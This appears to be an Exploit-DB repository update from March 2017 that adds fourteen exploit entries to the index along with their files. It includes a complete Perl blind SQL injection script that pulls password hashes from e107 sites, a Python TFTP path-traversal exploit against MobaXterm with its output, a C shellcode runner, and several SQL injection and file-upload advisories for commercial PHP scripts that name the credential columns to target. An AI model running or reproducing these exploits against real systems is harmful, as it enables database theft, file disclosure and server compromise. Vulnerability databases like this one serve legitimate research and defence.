DB: 2017-03-12

14 new exploits

MobaXterm Personal Edition 9.4 - Directory Traversal

Windows x86 - Hide Console Window Shellcode (182 bytes)
e107 <= 2.1.4 - 'keyword' Blind SQL Injection
Domain Marketplace Script - SQL Injection
Global In - SQL Injection
Global In - Arbitrary File Upload
Vanelo - SQL Injection
Mirage - SQL Injection
Pet Listing Script 3.0 - SQL Injection
Property Listing Script 3.1 - SQL Injection
Travel Tours Script 2.0 - SQL Injection
Yacht Listing Script 2.0 - SQL Injection
Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection
PHP Forum Script 3.0 - SQL Injection

files.csv

@@ -15313,6 +15313,7 @@ id,file,description,date,author,platform,type,port
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate  2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
+41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15938,6 +15939,7 @@ id,file,description,date,author,platform,type,port
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37493,3 +37495,15 @@ id,file,description,date,author,platform,type,port
 41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
 41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
 41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
+41580,platforms/php/webapps/41580.pl,"e107 <= 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps,0
+41582,platforms/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41583,platforms/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41584,platforms/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps,0
+41585,platforms/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41593,platforms/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41586,platforms/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0

platforms/php/webapps/41580.pl

@@ -0,0 +1,265 @@
+#!/usr/bin/perl
+#
+#
+# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
+#
+# --------------------------------------------------------------------------
+# [*] Discovered by staker - staker[at]hotmail[dot]it 
+# [*] Discovered on 09/03/2017
+# [*] Site Vendor: http://www.e107.org
+# [*] BUG: Blind SQL Injection
+# --------------------------------------------------------------------------
+#
+#
+# Description
+# -------------------------------------------------------------------------
+# e107 contains one flaw that allows an attacker to carry out an SQL
+# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script 
+# not properly saniting user-supplied input to the "keyword" POST variable
+# This may allow an attacker to inject or manipulate sql queries in
+# the backend database regardless of php.ini settings
+# -------------------------------------------------------------------------
+# SHORT EXPLANATION
+# -----------------------------------
+# 
+# FILE:  "e107_handlers/core_functions.php"
+#
+# 76. function vartrue(&$val, $default='')                     
+# 77. {
+# 78.   if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
+# 79.    return $default;
+# 80.}
+#
+# ----------------------------------
+#
+# FILE: "e107/e107_plugins/pm/pm.php"
+#
+# 
+# 35. if(vartrue($_POST['keyword']))   {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
+# 36. {
+# 37.   pm_user_lookup();
+# 38.}
+#
+#
+#
+# 615. function pm_user_lookup()
+# 616. {
+# 617.  $sql = e107::getDb();
+# 618.
+# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
+# 620. if($sql->gen($query))
+# 621. {
+# 622. echo '[';
+# 623  while($row = $sql->fetch())
+# 624. {
+# 625.   $u[] =  "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
+# 626. }
+# 627.
+# 628.  echo implode(",",$u);
+# 629.  echo ']';
+# -----------------------------------
+#
+#
+# use your brain..
+#
+# Greetz to: Warwolfz Crew,
+# meh, Dante90, SHADES MASTER and nexen
+#
+# -- 0gay --
+#
+# -----------------------------------
+# YOUR MOM IS NOT SAFE ANYMORE!!
+# CALL HER!!
+# -----------------------------------
+
+
+
+use strict;
+use IO::Socket::INET;
+use LWP::UserAgent;
+
+
+        
+
+my ($URL,$uid) = @ARGV;
+my @chars = (8..122);
+my ($i,$ord,$hash) = (1,undef,undef);
+
+
+
+
+
+if (@ARGV != 2) { usage(); } 
+
+
+$URL = parse::URL($URL);
+
+
+syswrite (STDOUT,"[-] Crypted Password: ");
+
+
+for ($i=0;$i<=60;$i++) 
+{
+             			
+   foreach $ord (@chars) 
+   { 
+             
+      if (e107::Query(sql($i,$ord),$URL) == 666 ) 
+	  {  
+	      syswrite (STDOUT,chr($ord));
+		  $hash .= chr($ord);
+		  last;
+	  }
+	  if ($i == 2 and not defined $hash) 
+	  {
+	     syswrite (STDOUT,"\n[-] Exploit Failed");
+		 exit;
+	  }	 
+   }		   
+}
+
+
+
+if (length($hash) == 60) {
+   die "\[-]Exploit Successfully";
+}
+else {
+   die "\n[-] Exploit Failed";
+}   
+
+
+
+
+
+sub e107::Query 
+{
+     
+      # 1st parameter, sql query
+      # 2nd parameter, e107 website	  
+
+	  my ($query,$URL) = @_;
+      my $response = undef; 
+	  
+      my $lwp = new LWP::UserAgent;
+
+
+      $lwp->default_header('User-Agent' => 'Lynx (textmode)');
+
+      $response = $lwp->post($URL."/pm/",
+                            [ 
+			     keyword => $query
+			    ]) or die $!;
+
+
+        if ($response->content =~ /caption/) {
+		   return 666;
+		} 
+        else {
+           return 0;
+        }		   
+		 
+}
+
+
+sub parse::URL
+{
+        my $string = shift @_ || die($!);
+         
+        if ($string !~ /^http:\/\/?/i) {
+                $string = 'http://'.$string;
+        }
+         
+        return $string;
+ }
+ 
+
+
+sub sql
+{
+       
+      # 1st parameter, an e107's userid
+      # 2nd parameter substring number
+      # 3rd parameter charcode number
+
+      my ($i,$j,$sql) = (shift,shift,undef);
+       
+      $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
+              
+      return $sql;        
+}        
+
+
+
+
+
+sub e107::Cookies
+{
+
+        my ($username,$password) = @_;
+        my ($packet,$content);
+        
+        my $host = "127.0.0.1";   # Valid Host  (insert it manually)
+		my $path = "/e107/";      # Valid e107 path (insert it manually)
+		
+		
+		my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
+		
+		
+		my $socket  = new IO::Socket::INET(
+                                            PeerAddr => $host,
+                                            PeerPort => 80,
+                                            Proto    => 'tcp',
+                                          ) or die $!;
+		
+		
+		 
+        $packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
+        $packet .= "Host: ".$host."\r\n";
+        $packet .= "User-Agent: Lynx (textmode)\r\n";
+        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+        $packet .= "Content-Length:".length($data)."\r\n";
+        $packet .= "Connection: close\r\n\r\n";
+        $packet.= $data;
+		
+        
+		$socket->send($packet);
+		
+		while (<$socket>) {
+		  $content .= $_;
+		}  
+		
+		
+		if ($content =~ /Set-Cookie: (.+?)/) {
+		    return $1;
+	    }
+        else {
+            die("[-] Login Failed..\n");
+        }			
+		
+		
+	# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
+        # it works without log-in, but if you got some trouble, try to use this one.
+        
+	# e107::Login('YOUR USERNAME','YOUR PASSWORD');
+}		
+		
+		
+sub usage() {
+         
+        print "[*---------------------------------------------------------*]\n".
+              "[*  e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit    *]\n".
+              "[*---------------------------------------------------------*]\n". 
+              "[* Usage: perl web.pl [host] [uid]                         *]\n".
+              "[*                                                         *]\n".
+              "[* Options:                                                *]\n".
+              "[* [host] insert a valid host                              *]\n".
+              "[* [uid]  insert a userid                                  *]\n".
+              "[*---------------------------------------------------------*]\n";        
+      exit;                       
+    
+}		
+		
+		
+	
+		
+			

platforms/php/webapps/41582.txt

@@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Domain Marketplace Script - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: http://scripteen.com/
+# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
+# Demo: http://dwm.domainauctionsscript.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
+# users :userId
+# users :data
+# users :payment_date
+# users :expiration_date
+# users :username
+# users :password
+# users :nume
+# users :adresa
+# Etc..
+# # # # #

platforms/php/webapps/41583.txt

@@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.techbizstudio.com/
+# Software: https://www.techbizstudio.com/product/linkedin-clone/
+# Demo: https://www.techbizstudio.com/demo/globalin/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
+# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
+# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
+# tb_admin :id
+# tb_admin :username
+# tb_admin :email
+# tb_admin :password
+# tb_admin :ip_address
+# tb_admin :is_active
+# Etc..
+# # # # #

platforms/php/webapps/41584.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Global In - Arbitrary File Upload
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.techbizstudio.com/
+# Software: https://www.techbizstudio.com/product/linkedin-clone/
+# Demo: https://www.techbizstudio.com/demo/globalin/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# Login as regular user
+# http://localhost/[PATH]/dashboard
+# Upload Photo / File.php
+# http://localhost/[PATH]/post-images/1113330455_File.php
+# Etc..
+# # # # #

platforms/php/webapps/41585.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Vanelo – Wanelo Clone - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.zoplay.com/
+# Software: https://www.zoplay.com/web/trending-marketplace-website/
+# Demo: http://wanelo.zoplay.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL]
+# Duplicate entry 'waneloclone
+# Etc..
+# # # # #

platforms/php/webapps/41586.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Pet Listing Script v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software: https://www.phpjabbers.com/pet-listing-script/
+# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41587.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Property Listing Script v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software: https://www.phpjabbers.com/property-listing-script/
+# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41588.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Travel Tours Script v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software: https://www.phpjabbers.com/travel-tours-script/
+# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41589.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Yacht Listing Script v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software: https://www.phpjabbers.com/yacht-listing-script/
+# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41590.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Yellow Pages Script v3.2 - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software: https://www.phpjabbers.com/yellow-pages-script/
+# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1
+# Version: 3.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41591.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: PHP Forum Script v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software: https://www.phpjabbers.com/php-forum-script/
+# Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC
+# Etc..
+# # # # #

platforms/php/webapps/41593.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Mirage – Fancy Clone - SQL Injection
+# Google Dork: N/A
+# Date: 11.03.2017
+# Vendor Homepage: https://www.zoplay.com/
+# Software: https://www.zoplay.com/web/multi-vendor-clone-website/
+# Demo: http://fancyclone.zoplay.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL]
+# Duplicate entry 'fancyclone
+# Etc..
+# # # # #

platforms/win_x86/shellcode/41581.c

@@ -0,0 +1,113 @@
+/*
+
+MIT License
+
+Copyright (c) 2017 Ege Balcı
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
+
+
+# Win32 - Hide Console Window Shellcode (182 BYTES)
+# Date: [11.03.2017]
+# Author: [Ege Balcı]
+# Tested on: [Win XP/Vista/7/8/8.1/10]
+
+@egeblc
+
+------------------------------------------------------------------
+
+This shellcode will hide the console window...
+
+[BITS 32]
+[ORG 0]
+
+
+pushad                  ; Save all register to stack
+pushfd                  ; Save all flags to stack
+cld
+call Start      
+%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
+
+Start:
+    pop ebp             ; Pop the address of SFHA
+
+    push 0x00000000	    ; Push the byte 'user32' ,0,0
+    push 0x00003233     ; ... 
+    push 0x72657375     ; ...
+    push esp            ; Push a pointer to the "user32" string on the stack.
+    push 0x0726774C     ; hash( "kernel32.dll", "LoadLibraryA" )
+    call ebp            ; LoadLibraryA( "user32" )
+    add esp,0x0C        ; Clear the stack
+		
+    push 0xCE726E89     ; hash("user32.dll", "GetConsoleWindow")
+    call ebp            ; GetConsoleWindow();
+
+    push 0x00000000	    ; 0
+    push eax            ; Console window handle
+    push 0x6E2EEBC2	    ; hash(User32.dll, ShowWindow)
+    call ebp		        ; ShowWindow(HANDLE,SW_HIDE);
+
+    popfd               ; Pop back all saved flags
+    popad               ; Pop back all saved registers
+    ret                 ; Return
+
+*/
+#include <windows.h>
+#include <stdio.h>
+
+unsigned char Shellcode[] = {
+  0x60, 0x9c, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31,
+  0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
+  0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c,
+  0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57,
+  0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48,
+  0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3,
+  0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf,
+  0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d,
+  0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c,
+  0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
+  0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f,
+  0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x00, 0x68, 0x33, 0x32,
+  0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x68, 0x4c, 0x77, 0x26,
+  0x07, 0xff, 0xd5, 0x83, 0xc4, 0x0c, 0x68, 0x89, 0x6e, 0x72, 0xce, 0xff,
+  0xd5, 0x6a, 0x00, 0x50, 0x68, 0xc2, 0xeb, 0x2e, 0x6e, 0xff, 0xd5, 0x9d,
+  0x61, 0xc3
+};
+
+
+
+void ExecuteShellcode();
+
+
+int main(int argc, char const *argv[])
+{
+	ExecuteShellcode();
+	getchar();
+	return 0;
+}
+
+
+void ExecuteShellcode(){
+	char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	memcpy(BUFFER, Shellcode, sizeof(Shellcode));
+	(*(void(*)())BUFFER)();	
+}
+
+

platforms/windows/remote/41592.txt

@@ -0,0 +1,125 @@
+[+] Credits: John Page AKA hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+=====================
+mobaxterm.mobatek.net
+
+
+
+Product:
+===============================
+MobaXterm Personal Edition v9.4
+
+Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more.
+
+
+
+Vulnerability Type:
+=====================================
+Path Traversal Remote File Disclosure
+
+
+
+
+CVE Reference:
+==============
+CVE-2017-6805
+
+
+
+Security Issue:
+================
+Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using
+directory traversal attacks e.g.  ../../../../Windows/system.ini
+
+Start MobaXterm TFTP server which listens on default TFTP port 69.
+
+c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
+Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
+
+c:\xampp\htdocs>type system.ini
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+
+Victim Data located on: 127.0.0.1
+
+
+
+POC URL:
+=============================
+https://vimeo.com/207516364
+
+
+
+
+Exploit:
+==========
+
+import sys,socket
+
+print 'MobaXterm TFTP Directory Traversal 0day Exploit'
+print 'Read Windows/system.ini'
+print 'hyp3rlinx \n'
+
+HOST = raw_input("[IP]>")
+FILE = 'Windows/system.ini' 
+PORT = 69                                        
+ 
+PAYLOAD = "\x00\x01"                                #TFTP Read 
+PAYLOAD += "../" * 4 + FILE + "\x00"                #Read system.ini using directory traversal
+PAYLOAD += "netascii\x00"                           #TFTP Type
+ 
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(PAYLOAD, (HOST, PORT))
+out = s.recv(1024)
+s.close()
+
+print "Victim Data located on : %s " %(HOST)
+print out.strip()
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: No Reply
+March 10, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx